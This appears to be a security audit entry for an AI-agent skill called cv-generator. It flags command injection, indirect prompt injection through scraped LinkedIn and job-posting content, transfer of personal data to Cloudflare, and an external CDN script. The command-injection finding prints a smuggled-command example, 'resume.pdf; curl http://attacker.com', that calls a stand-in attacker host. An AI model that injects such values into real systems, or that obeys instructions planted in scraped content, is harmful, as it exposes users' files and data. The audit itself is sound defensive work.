The Agent Skills Directory

[COMMAND_EXECUTION]: The skill uses shell commands to process user files and generate images. Specifically, it calls textutil -convert txt <file> -stdout and infsh app run ... --input '{"image_url": "[path-to-user-photo]"}'. These commands interpolate user-controlled file paths directly into the shell string. Without rigorous sanitization by the agent, this pattern is vulnerable to command injection if an attacker provides a maliciously crafted file path (e.g., resume.pdf; curl http://attacker.com).
[PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it ingests untrusted data from external sources (LinkedIn, company websites, job postings) via FirecrawlScrapeTool and PerplexitySonarSearchTool. This data is then processed to inform the agent's strategy and content generation.
Ingestion points: External data is fetched from URLs and user-uploaded documents (PDF, DOCX, Notion).
Boundary markers: The instructions do not specify any delimiters or safety markers to isolate external data from the system prompt.
Capability inventory: The skill has significant capabilities, including shell execution (bash), file system writes, and network deployment tools (wrangler).
Sanitization: There are no mentioned sanitization or validation steps for the scraped content before it is processed by the LLM.
[DATA_EXFILTRATION]: The skill is designed to deploy the user's extracted personal and professional information to Cloudflare Workers via wrangler deploy. While Cloudflare is a well-known service, this involves the automated transfer of potentially sensitive user data (contact details, work history) to a third-party hosting environment.
[EXTERNAL_DOWNLOADS]: The generated resume includes an external script dependency: html2pdf.js hosted on cdnjs.cloudflare.com. While the source is a well-known CDN, generating local HTML files that include and execute external JavaScript is a notable security surface.

cv-generator